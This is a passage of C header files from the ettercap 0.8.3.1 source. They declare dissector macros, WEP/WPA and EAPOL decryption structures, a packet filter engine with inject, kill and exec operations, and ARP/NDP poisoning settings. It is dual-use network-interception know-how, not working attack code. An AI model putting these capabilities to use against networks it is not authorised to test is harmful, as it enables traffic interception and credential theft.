FUNC_DECODER_PTR(decoder)); EC_API_EXTERN int dissect_modify(int mode, char *name, u_int32 port); #define MODE_ADD 0 #define MODE_REP 1 EC_API_EXTERN int dissect_match(void *id_sess, void *id_curr); EC_API_EXTERN void dissect_create_session(struct ec_session **s, struct packet_object *po, void *code); EC_API_EXTERN void dissect_wipe_session(struct packet_object *po, void *code); EC_API_EXTERN size_t dissect_create_ident(void **i, struct packet_object *po, void *code); EC_API_EXTERN int dissect_on_port(char *name, u_int16 port); EC_API_EXTERN int dissect_on_port_level(char *name, u_int16 port, u_int8 level); /* return true if the packet is coming from the server */ #define FROM_SERVER(name, pack) (dissect_on_port(name, ntohs(pack->L4.src)) == E_SUCCESS) /* return true if the packet is coming from the client */ #define FROM_CLIENT(name, pack) (dissect_on_port(name, ntohs(pack->L4.dst)) == E_SUCCESS) /* * creates the session on the first packet sent from * the server (SYN+ACK) */ #define CREATE_SESSION_ON_SYN_ACK(name, session, func) do{ \ if ((PACKET->L4.flags & TH_SYN) && (PACKET->L4.flags & TH_ACK) && dissect_on_port(name, ntohs(PACKET->L4.src)) == E_SUCCESS) { \ DEBUG_MSG("%s --> create_session_on_syn_ack", name); \ /* create the session */ \ dissect_create_session(&session, PACKET, DISSECT_CODE(func)); \ session_put(session); \ return NULL; \ } \ }while(0) /* * helper macros to get the banner of a service if it is the first thing * the server send to the client. * it must be used this way: * * IF_FIRST_PACKET_FROM_SERVER(21, s, i) { * * ... do something with PACKET->DISSECTOR.banner * * } ENDIF_FIRST_PACKET_FROM_SERVER(21, s, i) * */ #define IF_FIRST_PACKET_FROM_SERVER(name, session, ident, func) \ if (FROM_SERVER(name, PACKET) && PACKET->L4.flags & TH_PSH) { \ dissect_create_ident(&ident, PACKET, DISSECT_CODE(func)); \ /* the session exist */ \ if (session_get(&session, ident, sizeof(struct dissect_ident)) != -E_NOTFOUND) { \ /* prevent the deletion of session created for the user and pass */ \ if (session->data == NULL) #define IF_FIRST_PACKET_FROM_SERVER_SSL(name, names, session, ident, func) \ if ((FROM_SERVER(name, PACKET) || FROM_SERVER(names, PACKET)) && PACKET->L4.flags & TH_PSH) { \ dissect_create_ident(&ident, PACKET, DISSECT_CODE(func)); \ /* the session exist */ \ if (session_get(&session, ident, sizeof(struct dissect_ident)) != -E_NOTFOUND) { \ /* prevent the deletion of session created for the user and pass */ \ if (session->data == NULL) #define ENDIF_FIRST_PACKET_FROM_SERVER(session, ident) \ if (session->data == NULL) \ session_del(ident, sizeof(struct dissect_ident)); \ } \ SAFE_FREE(ident); \ return NULL; \ } #define DISSECT_MSG(x, ...) do { \ if (!EC_GBL_OPTIONS->superquiet) \ USER_MSG(x, ## __VA_ARGS__ ); \ } while(0) #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_encryption.h000664 000000 000000 00000013224 13711276346 020121 0ustar00rootroot000000 000000 #ifndef ETTERCAP_ENCRYPTION_H #define ETTERCAP_ENCRYPTION_H #include /* * WEP is based on RSA's rc4 stream cipher and uses a 24-bit initialization * vector (iv), which is concatenated with a 40-bit or 104-bit secret shared key * to create a 64-bit or 128-bit key which is used as the rc4 seed. Most cards * either generate the 24-bit iv using a counter or by using some sort of pseudo * random number generator (prng). The payload is then encrypted along with an * appended 32-bit checksum and sent out with the iv in plaintext as illustrated: * * 0 1 2 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | | * | 802.11 Header | * | | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | IV[0] | IV[1] | IV[2] | Key ID | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | . . . . . . SNAP[0] . . . . . | . . . . . SNAP[1] . . . . . . | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | . . . . . . SNAP[2] . . . . . | . . . . Protocol ID . . . . . | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | * | . . . . . . . . . . . . . Payload . . . . . . . . . . . . . . | * | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | . . . . . . . . . . . 32-bit Checksum . . . . . . . . . . . . | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * * . - denotes encrypted portion of packet * * After the data is sent out, the receiver simply concatenates the received iv * with their secret key to decrypt the payload. If the checksum checks out, then * the packet is valid. */ #define WEP_IV_LEN 3 #define WEP_CRC_LEN 4 #define WPA_IV_LEN 8 #define MAX_WKEY_LEN 32 /* 256 bit */ struct wep_header { u_int8 init_vector[WEP_IV_LEN]; u_int8 key; }; struct wpa_header { u_int8 init_vector[WPA_IV_LEN]; }; /* * http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/Details+of+Key+Derivation+for+WPA/ * * http://en.wikipedia.org/wiki/IEEE_802.11i-2004 * */ #define WPA_KEY_LEN 32 #define WPA_NONCE_LEN 32 #define WPA_PTK_LEN 64 /* TKIP uses 48 bytes, CCMP uses 64 bytes */ #define WPA_MICKEY_LEN 16 #define WPA_KCK_LEN 16 #define WPA_DEC_KEY_LEN 16 #define WPA_CCMP_TRAILER 8 struct __attribute__ ((__packed__)) rsn_ie_header { u_int8 id; u_int8 len; u_int8 OUI[4]; u_int16 version; u_int8 multicastOUI[4]; u_int16 iUnicastCount; /* this should always be 1 for WPA client */ u_int8 unicastOUI[4]; u_int16 iAuthCount; /* this should always be 1 for WPA client */ u_int8 authOUI[4]; u_int16 wpa_cap; }; struct __attribute__ ((__packed__)) eapol_header { u_int8 version; u_int8 type; #define EAP_PACKET 0x00 #define EAPOL_START 0x01 #define EAPOL_LOGOFF 0x02 #define EAPOL_KEY 0x03 #define EAPOL_ENCAP 0x04 u_int16 len; }; struct __attribute__ ((__packed__)) eapol_key_header { u_int8 type; #define EAPOL_KEY_RSN 0x02 #define EAPOL_KEY_WPA 0xfe u_int16 key_info; #define WPA_KEY_TKIP 0x0001 #define WPA_KEY_CCMP 0x0002 #define WPA_KEY_PAIRWISE 0x0008 #define WPA_KEY_INSTALL 0x0040 #define WPA_KEY_ACK 0x0080 #define WPA_KEY_MIC 0x0100 #define WPA_KEY_SECURE 0x0200 #define WPA_KEY_ENCRYPT 0x1000 u_int16 key_len; u_int8 replay_counter[8]; u_int8 key_nonce[32]; u_int8 key_IV[16]; u_int8 key_RSC[8]; u_int8 key_ID[8]; u_int8 key_MIC[16]; u_int16 key_data_len; }; struct wpa_sa { struct timeval tv; /* used to timeout the session */ u_char state; u_char algo; u_char SNonce[WPA_NONCE_LEN]; u_char ANonce[WPA_NONCE_LEN]; u_char ptk[WPA_PTK_LEN * 2]; /* 512 bit is the max PRF will output, multiply the space for key calculation */ u_char decryption_key[WPA_DEC_KEY_LEN]; }; struct wpa_session { u_char sta[ETH_ADDR_LEN]; /* the STA mac address that is associating */ struct wpa_sa sa; LIST_ENTRY (wpa_session) next; }; #define XOR_BLOCK(b, a, len) \ { \ int i; \ for (i = 0; i < (int)(len); i++) \ (b)[i] ^= (a)[i]; \ } /* forward declaration in wifi_eapol.c */ struct rsn_ie_header; struct eapol_header; struct eapol_key_header; extern int wep_decrypt(u_char *buf, size_t len, u_char *wkey, size_t wlen); extern int wifi_key_prepare(char *key_string); extern void wpa_sess_add(u_char *sta, struct wpa_sa *sa); extern void wpa_sess_del(u_char *sta); extern int wpa_sess_get(u_char *sta, struct wpa_sa *sa); extern int wpa_generate_PTK(u_char *bssid, u_char *sta, u_char *pmk, u_char *snonce, u_char *anonce, u_int16 bits, u_char *ptk); extern int wpa_check_MIC(struct eapol_header *eapol, struct eapol_key_header* eapol_key, size_t eapol_len, u_char *kck, int algo); extern int wpa_decrypt_broadcast_key(struct eapol_key_header *eapol_key, struct rsn_ie_header *rsn_ie, struct wpa_sa *sa); extern int wpa_decrypt(u_char *mac, u_char *data, size_t len, struct wpa_sa sa); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_error.h000664 000000 000000 00000002513 13711276346 017057 0ustar00rootroot000000 000000 #ifndef ETTERCAP_ERROR_H #define ETTERCAP_ERROR_H #include #include enum { E_SUCCESS = 0, E_NOTFOUND = 1, E_NOMATCH = 2, E_NOTHANDLED = 3, E_INVALID = 4, E_NOADDRESS = 5, E_DUPLICATE = 6, E_TIMEOUT = 7, E_INITFAIL = 8, E_FOUND = 128, E_BRIDGE = 129, E_VERSION = 254, E_FATAL = 255, }; EC_API_EXTERN void error_msg(char *file, const char *function, int line, char *message, ...); EC_API_EXTERN void warn_msg(char *file, const char *function, int line, char *message, ...); EC_API_EXTERN void fatal_error(char *message, ...); EC_API_EXTERN void bug(char *file, const char *function, int line, char *message); #define WARN_MSG(x, ...) warn_msg(__FILE__, __FUNCTION__, __LINE__, x, ## __VA_ARGS__ ) #define ERROR_MSG(x, ...) error_msg(__FILE__, __FUNCTION__, __LINE__, x, ## __VA_ARGS__ ) #define FATAL_ERROR(x, ...) do { fatal_error(x, ## __VA_ARGS__ ); } while(0) #define ON_ERROR(x, y, fmt, ...) do { if (x == y) ERROR_MSG(fmt, ## __VA_ARGS__ ); } while(0) #define BUG_IF(x) do { if (x) bug(__FILE__, __FUNCTION__, __LINE__, #x); }while(0) #define BUG(x) do { bug(__FILE__, __FUNCTION__, __LINE__, #x); }while(0) #define NOT_IMPLEMENTED() do { BUG("Not yet implemented, please contact the authors"); } while(0) #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_file.h000664 000000 000000 00000001757 13711276346 016656 0ustar00rootroot000000 000000 #ifndef ETTERCAP_FILE_H #define ETTERCAP_FILE_H EC_API_EXTERN FILE * open_data(char *dir, char *file, char *mode); EC_API_EXTERN char * get_full_path(const char *dir, const char *file); EC_API_EXTERN char * get_local_path(const char *file); #define MAC_FINGERPRINTS "etter.finger.mac" #define TCP_FINGERPRINTS "etter.finger.os" #define SERVICES_NAMES "etter.services" #define ETTER_CONF "etter.conf" #define ETTER_DNS "etter.dns" #define ETTER_MDNS "etter.mdns" #define ETTER_NBNS "etter.nbns" #define ETTER_FIELDS "etter.fields" #define CERT_FILE "etter.ssl.crt" /* fopen modes */ #define FOPEN_READ_TEXT "r" #define FOPEN_READ_BIN "rb" #define FOPEN_WRITE_TEXT "w" #define FOPEN_WRITE_BIN "wb" #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_filter.h000664 000000 000000 00000006750 13711276346 017222 0ustar00rootroot000000 000000 #ifndef ETTERCAP_FILTER_H #define ETTERCAP_FILTER_H #include #include #ifdef HAVE_PCRE #include #endif /* * this is the struct used by the filtering engine * it is the equivalent of a processor's instruction * * they are organized in an array and evaluated one * at a time. the jump are absolute and the addressing * is done by the array position. * */ //#define MAX_FILTER_LEN 200 struct filter_op { char opcode; #define FOP_EXIT 0 #define FOP_TEST 1 #define FOP_ASSIGN 2 #define FOP_INC 3 #define FOP_DEC 4 #define FOP_FUNC 5 #define FOP_JMP 6 #define FOP_JTRUE 7 #define FOP_JFALSE 8 /* * the first two field of the structs (op and level) must * overlap the same memory region. it is abused in ef_encode.c * encoding a function that uses an offset as an argument */ union { /* functions */ struct { char op; #define FFUNC_SEARCH 0 #define FFUNC_REGEX 1 #define FFUNC_PCRE 2 #define FFUNC_REPLACE 3 #define FFUNC_INJECT 4 #define FFUNC_LOG 5 #define FFUNC_DROP 6 #define FFUNC_KILL 7 #define FFUNC_MSG 8 #define FFUNC_EXEC 9 #define FFUNC_EXECINJECT 10 #define FFUNC_EXECREPLACE 11 u_int8 level; u_int8 *string; size_t slen; u_int8 *replace; size_t rlen; struct regex_opt *ropt; } func; /* tests */ struct { u_int8 op; #define FTEST_EQ 0 #define FTEST_NEQ 1 #define FTEST_LT 2 #define FTEST_GT 3 #define FTEST_LEQ 4 #define FTEST_GEQ 5 u_int8 level; u_int8 size; u_int16 offset; u_int32 value; u_int8 ipaddr[16]; u_int8 *string; size_t slen; } test, assign; /* jumps */ u_int16 jmp; } op; }; /* the header for a binary filter file * * a file is structured as follow: * the header * the data segment (containing all the strings) * the code segment (containing all the instructions) * * when the file is loaded all the string must be referenced * by the instructions */ struct filter_header { /* magic number */ u_int16 magic; #define EC_FILTER_MAGIC 0xe77e /* ettercap version */ char version[16]; /* pointers to the segments */ u_int16 data; u_int16 code; }; /* filters header for mmapped region */ struct filter_env { void *map; struct filter_op *chain; size_t len; }; /* filter list entry */ struct filter_list { u_int8 enabled; char *name; struct filter_env env; struct filter_list *next; }; /* uset to compile the regex while loading the file */ struct regex_opt { regex_t *regex; #ifdef HAVE_PCRE pcre *pregex; pcre_extra *preg_extra; #endif }; #define PCRE_OVEC_SIZE 100 void filter_init_mutex(void); /* exported functions */ EC_API_EXTERN void filter_packet(struct packet_object *po); EC_API_EXTERN int filter_load_file(const char *filename, struct filter_list **list, uint8_t enabled); EC_API_EXTERN void filter_unload(struct filter_list **list); EC_API_EXTERN void filter_clear(void); EC_API_EXTERN void filter_walk_list( int(*cb)(struct filter_list*, void*), void *arg); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_fingerprint.h000664 000000 000000 00000005424 13711276346 020261 0ustar00rootroot000000 000000 #ifndef ETTERCAP_FINGERPRINT_H #define ETTERCAP_FINGERPRINT_H EC_API_EXTERN int fingerprint_init(void); EC_API_EXTERN int fingerprint_search(const char *f, char *dst); EC_API_EXTERN void fingerprint_default(char *finger); EC_API_EXTERN void fingerprint_push(char *finger, int param, int value); EC_API_EXTERN u_int8 TTL_PREDICTOR(u_int8 x); EC_API_EXTERN int fingerprint_submit(char* host, char* page, const char *finger, const char *os); #define DEFAULT_HOST "https://www.ettercap-project.org" #define DEFAULT_PAGE "fingerprint.php" /* * The fingerprint database has the following structure: * * WWWW:MSS:TTL:WS:S:N:D:T:F:LEN:OS * * WWWW: 4 digit hex field indicating the TCP Window Size * MSS : 4 digit hex field indicating the TCP Option Maximum Segment Size * if omitted in the packet or unknown it is "_MSS" * TTL : 2 digit hex field indicating the IP Time To Live * WS : 2 digit hex field indicating the TCP Option Window Scale * if omitted in the packet or unknown it is "WS" * S : 1 digit field indicating if the TCP Option SACK permitted is true * N : 1 digit field indicating if the TCP Options contain a NOP * D : 1 digit field indicating if the IP Don't Fragment flag is set * T : 1 digit field indicating if the TCP Timestamp is present * F : 1 digit ascii field indicating the flag of the packet * S = SYN * A = SYN + ACK * LEN : 2 digit hex field indicating the length of the packet * if irrilevant or unknown it is "LT" * OS : an ascii string representing the OS */ enum { FINGER_LEN = 28, OS_LEN = 60, HOST_LEN = 100, PAGE_LEN = 100, FINGER_WINDOW = 0, FINGER_MSS = 5, FINGER_TTL = 10, FINGER_WS = 13, FINGER_SACK = 16, FINGER_NOP = 18, FINGER_DF = 20, FINGER_TIMESTAMP = 22, FINGER_TCPFLAG = 24, FINGER_LT = 26, }; /* * the structure for passive information * carried by PO */ struct passive_info { char fingerprint[FINGER_LEN+1]; char flags; #define FP_UNKNOWN 0 /* this happen reading form a file */ #define FP_HOST_LOCAL 1 #define FP_HOST_NONLOCAL 1<<1 #define FP_GATEWAY 1<<2 #define FP_ROUTER 1<<3 }; #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_format.h000664 000000 000000 00000001537 13711276346 017223 0ustar00rootroot000000 000000 #ifndef ETTERCAP_FORMAT_H #define ETTERCAP_FORMAT_H EC_API_EXTERN int hex_len(int len); EC_API_EXTERN int hex_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int ascii_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int text_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int ebcdic_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int html_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int bin_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int zero_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int utf8_format(const u_char *buf, size_t len, u_char *dst); EC_API_EXTERN int set_utf8_encoding(u_char *fromcode); EC_API_EXTERN int set_format(char *format); #define HEX_CHAR_PER_LINE 16 #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_geoip.h000664 000000 000000 00000000447 13711276346 017035 0ustar00rootroot000000 000000 #ifndef ETTERCAP_GEOIP_H #define ETTERCAP_GEOIP_H #include #include #ifdef HAVE_GEOIP EC_API_EXTERN void geoip_init (void); EC_API_EXTERN const char* geoip_ccode_by_ip (struct ip_addr *ip); EC_API_EXTERN const char* geoip_country_by_ip (struct ip_addr *ip); #endif #endif ettercap-0.8.3.1/include/ec_globals.h000664 000000 000000 00000013300 13711276346 017345 0ustar00rootroot000000 000000 #ifndef ETTERCAP_GLOBALS_H #define ETTERCAP_GLOBALS_H #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* options form etter.conf */ struct ec_conf { char *file; int ec_uid; int ec_gid; int arp_storm_delay; int arp_poison_smart; int arp_poison_warm_up; int arp_poison_delay; int arp_poison_icmp; int arp_poison_reply; int arp_poison_request; int arp_poison_equal_mac; int dhcp_lease_time; int port_steal_delay; int port_steal_send_delay; #ifdef WITH_IPV6 int ndp_poison_warm_up; int ndp_poison_delay; int ndp_poison_send_delay; int ndp_poison_icmp; int ndp_poison_equal_mac; int icmp6_probe_delay; #endif int connection_timeout; int connection_idle; int connection_buffer; int connect_timeout; int sampling_rate; int close_on_eof; int aggressive_dissectors; int skip_forwarded; int checksum_check; int submit_fingerprint; int checksum_warning; int sniffing_at_startup; int geoip_support_enable; int gtkui_prefer_dark_theme; int store_profiles; struct curses_color colors; char *redir_command_on; char *redir_command_off; #ifdef WITH_IPV6 char *redir6_command_on; char *redir6_command_off; #endif char *remote_browser; char *utf8_encoding; char *geoip_data_file; char *geoip_data_file_v6; }; /* options from getopt */ struct ec_options { char write:1; char read:1; char compress:1; char quiet:1; char superquiet:1; char silent:1; char ip6scan:1; char unoffensive:1; char ssl_mitm:1; char load_hosts:1; char save_hosts:1; char resolve:1; char ext_headers:1; char mitm:1; char only_mitm:1; char remote:1; char gateway:1; char lifaces:1; char broadcast:1; char reversed; char *hostsfile; LIST_HEAD(plugin_list_t, plugin_list) plugins; char *proto; char *netmask; char *address; char *iface; char *iface_bridge; char **secondary; char *pcapfile_in; char *pcapfile_out; char *target1; char *target2; char *script; char *ssl_cert; char *ssl_pkey; FILE *msg_fd; int (*format)(const u_char *, size_t, u_char *); regex_t *regex; }; /* program name and version */ struct program_env { char *name; char *version; char *debug_file; }; /* global pcap structure */ struct pcap_env { pcap_if_t *ifs; u_int8 align; /* alignment needed on sparc 4*n - sizeof(media_hdr) */ char promisc; char *filter; /* pcap filter */ int snaplen; int dlt; pcap_dumper_t *dump; u_int32 dump_size; /* total dump size */ u_int32 dump_off; /* current offset */ }; /* lnet structure */ struct lnet_env { libnet_t *lnet_IP4; libnet_t *lnet_IP6; }; /* ip list per target */ struct ip_list { struct ip_addr ip; LIST_ENTRY(ip_list) next; }; /* scanned hosts list */ struct hosts_list { struct ip_addr ip; u_int8 mac[MEDIA_ADDR_LEN]; char *hostname; LIST_ENTRY(hosts_list) next; }; /* target specifications */ struct target_env { char scan_all:1; char all_mac:1; /* these one bit flags are used as wildcards */ char all_ip:1; char all_ip6:1; char all_port:1; char *proto; u_char mac[MEDIA_ADDR_LEN]; LIST_HEAD(, ip_list) ips; LIST_HEAD(, ip_list) ip6; u_int8 ports[1<<13]; /* in 8192 byte we have 65535 bits, use one bit per port */ }; /* wifi network structure */ struct wifi_env { char wireless; /* if the send interface is wireless */ u_char wifi_schema; #define WIFI_WEP 0x01 #define WIFI_WPA 0x02 char *wifi_key; /* user specified wifi_key */ u_char wkey[MAX_WKEY_LEN]; /* encoded wifi key, large enough for all encryption schemas */ size_t wkey_len; }; /* the globals container */ struct ec_globals { struct ec_conf *conf; struct ec_options *options; struct gbl_stats *stats; struct ui_ops *ui; struct program_env *env; struct pcap_env *pcap; struct lnet_env *lnet; struct iface_env *iface; struct iface_env *bridge; struct sniffing_method *sm; struct target_env *t1; struct target_env *t2; struct wifi_env *wifi; LIST_HEAD(, hosts_list) hosts_list; TAILQ_HEAD(gbl_ptail, host_profile) profiles_list_head; struct filter_list *filters; }; EC_API_EXTERN struct ec_globals *ec_gbls; #define EC_GBLS ec_gbls #define EC_GBL_CONF (EC_GBLS->conf) #define EC_GBL_OPTIONS (EC_GBLS->options) #define EC_GBL_STATS (EC_GBLS->stats) #define EC_GBL_UI (EC_GBLS->ui) #define EC_GBL_ENV (EC_GBLS->env) #define EC_GBL_PCAP (EC_GBLS->pcap) #define EC_GBL_LNET (EC_GBLS->lnet) #define EC_GBL_IFACE (EC_GBLS->iface) #define EC_GBL_BRIDGE (EC_GBLS->bridge) #define EC_GBL_SNIFF (EC_GBLS->sm) #define EC_GBL_TARGET1 (EC_GBLS->t1) #define EC_GBL_TARGET2 (EC_GBLS->t2) #define EC_GBL_WIFI (EC_GBLS->wifi) #define EC_GBL_HOSTLIST (EC_GBLS->hosts_list) #define EC_GBL_PROFILES (EC_GBLS->profiles_list_head) #define EC_GBL_FILTERS &(EC_GBLS->filters) #define EC_GBL_FORMAT (EC_GBL_OPTIONS->format) #define EC_GBL_PROGRAM (EC_GBL_ENV->name) #define EC_GBL_VERSION (EC_GBL_ENV->version) #define EC_GBL_DEBUG_FILE (EC_GBL_ENV->debug_file) /* exported functions */ EC_API_EXTERN void ec_globals_alloc(void); EC_API_EXTERN void ec_globals_free(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_hash.h000664 000000 000000 00000000542 13711276346 016651 0ustar00rootroot000000 000000 #ifndef __FNV_H__ #define __FNV_H__ #include typedef unsigned long Fnv32_t; #define FNV1_32_INIT ((Fnv32_t)0x811c9dc5) typedef unsigned long long Fnv64_t; #define FNV1_64_INIT ((Fnv64_t)0xcbf29ce484222325ULL) EC_API_EXTERN Fnv32_t fnv_32(void *buf, size_t len); EC_API_EXTERN Fnv64_t fnv_64(void *buf, size_t len); #endif /* __FNV_H__ */ ettercap-0.8.3.1/include/ec_hook.h000664 000000 000000 00000003476 13711276346 016677 0ustar00rootroot000000 000000 #ifndef ETTERCAP_HOOK_H #define ETTERCAP_HOOK_H #include EC_API_EXTERN void hook_point(int point, struct packet_object *po); enum { HOOK_RECEIVED = 0, /* raw packet, the L* structures are not filled */ HOOK_DECODED = 1, /* all the packet after the protocol stack parsing */ HOOK_PRE_FORWARD = 2, /* right before the forward (if it has to be forwarded) */ HOOK_HANDLED = 3, /* top of the stack but before the decision of PO_INGORE */ HOOK_FILTER = 4, /* the content filtering point */ HOOK_DISPATCHER = 5, /* in the TOP HALF (the packet is a copy) */ }; /* these are used the hook received packets */ enum { HOOK_PACKET_BASE = 50, HOOK_PACKET_ETH, HOOK_PACKET_FDDI, HOOK_PACKET_TR, HOOK_PACKET_WIFI, HOOK_PACKET_ARP, HOOK_PACKET_ARP_RQ, HOOK_PACKET_ARP_RP, HOOK_PACKET_IP, HOOK_PACKET_IP6, HOOK_PACKET_UDP, HOOK_PACKET_TCP, HOOK_PACKET_ICMP, HOOK_PACKET_LCP, HOOK_PACKET_ECP, HOOK_PACKET_IPCP, HOOK_PACKET_PPP, HOOK_PACKET_GRE, HOOK_PACKET_VLAN, HOOK_PACKET_ICMP6, HOOK_PACKET_ICMP6_NSOL, HOOK_PACKET_ICMP6_NADV, HOOK_PACKET_ICMP6_RPLY, HOOK_PACKET_ICMP6_PARM, HOOK_PACKET_PPPOE, HOOK_PACKET_PPP_PAP, HOOK_PACKET_MPLS, HOOK_PACKET_ERF, HOOK_PACKET_ESP, /* high level protocol hooks */ HOOK_PROTO_BASE = 100, HOOK_PROTO_SMB, HOOK_PROTO_SMB_CHL, HOOK_PROTO_SMB_CMPLT, HOOK_PROTO_DHCP_REQUEST, HOOK_PROTO_DHCP_DISCOVER, HOOK_PROTO_DHCP_PROFILE, HOOK_PROTO_DNS, HOOK_PROTO_MDNS, HOOK_PROTO_NBNS, HOOK_PROTO_HTTP, HOOK_PROTO_KRB5 }; EC_API_EXTERN void hook_add(int point, void (*func)(struct packet_object *po) ); EC_API_EXTERN int hook_del(int point, void (*func)(struct packet_object *po) ); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_http.h000664 000000 000000 00000000206 13711276346 016702 0ustar00rootroot000000 000000 #ifndef ETTERCAP_HTTP_H #define ETTERCAP_HTTP_H EC_API_EXTERN int http_fields_init(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_inet.h000664 000000 000000 00000012376 13711276346 016675 0ustar00rootroot000000 000000 #ifndef ETTERCAP_INET_H #define ETTERCAP_INET_H #include #ifdef OS_WINDOWS #include #include #else #include #include #include #endif #include #ifdef OS_CYGWIN #ifndef AF_INET6 /* XXX - ugly hack only to make it compile */ #define AF_INET6 23 #endif #endif /* * define non-standard address family identifier * used in the Null/Loopback encapsulation origined * on several BSD derivates */ #define AF_INET6_LINUX 10 #define AF_INET6_BSD 24 #define AF_INET6_FREEBSD 28 #define AF_INET6_DARWIN 30 #define ETH_ADDR_LEN 6 #define TR_ADDR_LEN 6 #define FDDI_ADDR_LEN 6 #define MEDIA_ADDR_LEN 6 #define IP_ADDR_LEN 4 #define IP6_ADDR_LEN 16 #define MAX_IP_ADDR_LEN IP6_ADDR_LEN #define ETH_ASCII_ADDR_LEN 19 // sizeof("ff:ff:ff:ff:ff:ff")+1 #define IP_ASCII_ADDR_LEN 17 // sizeof("255.255.255.255")+1 #define IP6_ASCII_ADDR_LEN 47 // sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1 #define MAX_ASCII_ADDR_LEN IP6_ASCII_ADDR_LEN /* * Some predefined addresses here */ #define IP6_ALL_NODES "\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" #define IP6_ALL_ROUTERS "\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" #define IP6_SOL_NODE "\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x00\x00\x00" #define IP6_DSTOPT_UNKN "\x80\x01\x00\x00\x00" #define LLA_IP6_ALLNODES_MULTICAST "\x33\x33\x00\x00\x00\x01" /* * this structure is used by ettercap to handle * an IP packet disregarding its version */ struct ip_addr { u_int16 addr_type; u_int16 addr_len; /* this must be aligned in memory */ union { u_int8 addr[MAX_IP_ADDR_LEN]; u_int16 addr16[MAX_IP_ADDR_LEN/2]; u_int32 addr32[MAX_IP_ADDR_LEN/4]; }; }; struct net_list { struct ip_addr ip; struct ip_addr netmask; struct ip_addr network; u_int8 prefix; LIST_ENTRY(net_list) next; }; EC_API_EXTERN int ip_addr_init(struct ip_addr *sa, u_int16 type, u_char *addr); EC_API_EXTERN int ip_addr_cpy(u_char *addr, struct ip_addr *sa); EC_API_EXTERN int ip_addr_cmp(struct ip_addr *sa, struct ip_addr *sb); EC_API_EXTERN int ip_addr_null(struct ip_addr *sa); EC_API_EXTERN int ip_addr_is_zero(struct ip_addr *sa); EC_API_EXTERN int ip_addr_random(struct ip_addr* ip, u_int16 type); EC_API_EXTERN int ip_addr_init_sol(struct ip_addr* sn, struct ip_addr* ip, u_int8 *tmac); EC_API_EXTERN char *ip_addr_ntoa(struct ip_addr *sa, char *dst); EC_API_EXTERN int ip_addr_pton(char *str, struct ip_addr *addr); EC_API_EXTERN char *mac_addr_ntoa(u_char *mac, char *dst); EC_API_EXTERN int mac_addr_aton(char *str, u_char *mac); EC_API_EXTERN int ip_addr_is_local(struct ip_addr *sa, struct ip_addr *ifaddr); EC_API_EXTERN int ip_addr_is_global(struct ip_addr *ip); EC_API_EXTERN int ip_addr_is_multicast(struct ip_addr *ip); EC_API_EXTERN int ip_addr_is_broadcast(struct ip_addr *sa); EC_API_EXTERN int ip_addr_is_ours(struct ip_addr *ip); EC_API_EXTERN int ip_addr_get_network(struct ip_addr*, struct ip_addr*, struct ip_addr*); EC_API_EXTERN int ip_addr_get_prefix(struct ip_addr* netmask); /* * this prototypes are implemented in ./os/.../ * each OS implement its specific function */ EC_API_EXTERN void disable_ip_forward(void); EC_API_EXTERN void restore_ip_forward(void); EC_API_EXTERN u_int16 get_iface_mtu(const char *iface); #ifdef WITH_IPV6 EC_API_EXTERN void disable_ipv6_forward(void); EC_API_EXTERN void restore_ipv6_forward(void); #endif #ifdef OS_LINUX EC_API_EXTERN void disable_interface_offload(void); #endif #if defined OS_LINUX && defined WITH_IPV6 EC_API_EXTERN void check_tempaddr(const char *iface); #endif /********************/ #ifdef WORDS_BIGENDIAN /* BIG ENDIAN */ #define phtos(x) ( (u_int16) \ ((u_int16)*((u_int8 *)x+1)<<8| \ (u_int16)*((u_int8 *)x+0)<<0) \ ) #define phtol(x) ( (u_int32)*((u_int8 *)x+3)<<24| \ (u_int32)*((u_int8 *)x+2)<<16| \ 